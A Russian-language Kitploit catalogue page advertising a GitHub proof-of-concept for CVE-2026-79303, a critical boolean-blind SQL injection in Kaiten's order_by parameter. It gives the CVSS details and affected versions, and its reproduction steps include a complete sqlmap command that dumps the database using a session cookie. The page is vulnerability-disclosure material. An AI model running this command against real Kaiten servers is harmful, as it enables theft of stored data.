Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-79303 — # PoC для CVE-2026-79303 Proof-of-concept для CVE-2026-79303 — критической boolean-blind SQL-инъекции в Kaiten, затрагивающей параметры `order_by` и `order_direction`, с шагами воспроизведения и деталями CVSS 9.9. | Kitploit
Инструменты/GitHubGitHub/4ybrick/cve-2026-79303
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHub4ybrick/cve-2026-79303

CVE-2026-79303

# PoC для CVE-2026-79303 Proof-of-concept для CVE-2026-79303 — критической boolean-blind SQL-инъекции в Kaiten, затрагивающей параметры `order_by` и `order_direction`, с шагами воспроизведения и деталями CVSS 9.9.

Репозиторий
17 ч 34 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-79303

Boolean-blind SQL-инъекция

Описание: Динамические SQL-запросы формируются без необходимой проверки данных и без использования параметризованных запросов или хранимых процедур.

Воздействие: SQLi

Вектор CVSSv3.1: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9 Critical)

CWE: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Затронутый компонент: GET-параметры order_by и order_direction

Вендор: kaiten

Затронутый продукт

  • kaiten версии: 57.192.20 < 57.214.26

Шаги воспроизведения:

  1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
  2. Введите n (не объединять ваш cookie с новым) -> C
Уязвимый параметр

Обнаружил

  • Danil Belov

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2026-79303
  • https://bdu.fstec.ru/vul/2025-02933
  • https://kaiten.ru/
Скачать инструмент